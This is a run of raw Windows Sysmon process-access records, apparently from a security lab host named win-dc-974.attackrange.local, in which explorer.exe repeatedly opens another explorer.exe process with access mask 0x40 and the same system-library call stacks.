16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 